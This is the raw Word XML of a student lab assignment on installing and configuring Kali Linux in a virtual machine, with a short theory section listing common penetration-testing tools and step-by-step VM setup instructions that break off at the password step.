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4E2C" w14:textId="77777777" w:rsidR="007A5A4F" w:rsidRDefault="007A5A4F" w:rsidP="007A5A4F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Garvin Chanderia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650B9F7" w14:textId="77777777" w:rsidR="007A5A4F" w:rsidRDefault="007A5A4F" w:rsidP="007A5A4F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2203132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FAF33F" w14:textId="77777777" w:rsidR="007A5A4F" w:rsidRDefault="007A5A4F" w:rsidP="007A5A4F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LY-ISA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11938722" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ASSIGNMENT NO.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3EE34" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Installation and configuration of Kali Linux for penetrating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C62C57" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Theory:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security. Kali Linux has approximately 600 penetration-testing programs (tools), including Armitage (a graphical cyber-attack management tool), Nmap (a port scanner), Wireshark (a packet analyzer), metasploit (penetration testing framework), John the Ripper (a password cracker), sqlmap (automatic SQL injection and database takeover tool), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP web application security scanners,etc. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous information security testing Linux distribution based on Knoppix.Kali Linux is based on the Debian Testing branch. Most packages Kali uses are imported from the Debian repositories. Kali Linux's popularity grew when it was featured in multiple episodes of the TV series Mr. Robot. Tools highlighted in the show and provided by Kali Linux include Bluesniff, Bluetooth Scanner (btscanner), John the Ripper, Metasploit Framework, Nmap, Shellshock, and Wget.The tagline of Kali Linux and BackTrack is "the quieter you become, the more you are able to hear", which is displayed on some backgrounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359FCB37" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PREREQUISITES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43CD01" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VMWare Workstation Pro/Oracle Virtual Box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C78E8" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux (iso) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51571214" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Download links </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D7324" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux - &gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://cdimage.kali.org/kali-2023.3/kali-linux-2023.3-installer-amd64.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6016F8CE" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00A53A4B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C53D0AC" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VMWare Workstation Pro/Oracle Virtual Box Installation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66794E84" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C61DDB" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Open VMWare Workstation; click File&gt; New Virtual Machine (CTRL +N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097436B9" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select Custom(advance) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A641AB8" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61D191" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1A7E1" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Browse and select the iso file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682347C" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Click Next &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C245968" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986B4E2" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the Guest Operating System as “Other 64-Bit” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD63498" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click Next&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC73AC" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE8020" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mention the Virtual Machine Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6222B" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B99D97" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the number of Processors and Core </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF9F1F" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Please note- based on your systems configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E82602" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06C19E" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Define the memory allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E884A" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do not forget to keep some memory for your host machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF7113" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A1B8DA" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select NAT (Network Address Translation) as default network connection for virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D3998" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7511D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select Next&gt; (for all recommended settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FA31E" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select Disk&gt; “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Create a new virtual disk”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31B114" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Specify the Disk Capacity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30633DC9" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Store virtual disk as a single file”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4602B0" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click Next &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1FC65" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C7C17" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Click Next &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051708D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Final tab view will display the selected settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F577DCF" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hit Finish!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A822498" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Power On the virtual machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2D679" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AAD884" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select “Graphical Install”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434123D5" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35088117" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select Language; Location and Keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D199D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter the hostname “Kali”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DC4FBD" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBC5DF" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter domain name – “Kali”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6812EF67" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397728C5" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter the username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63EC0D" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 14:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33638A70" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter your password for user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2AAC1" w14:textId="77777777" w:rsidR="00A53A4B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
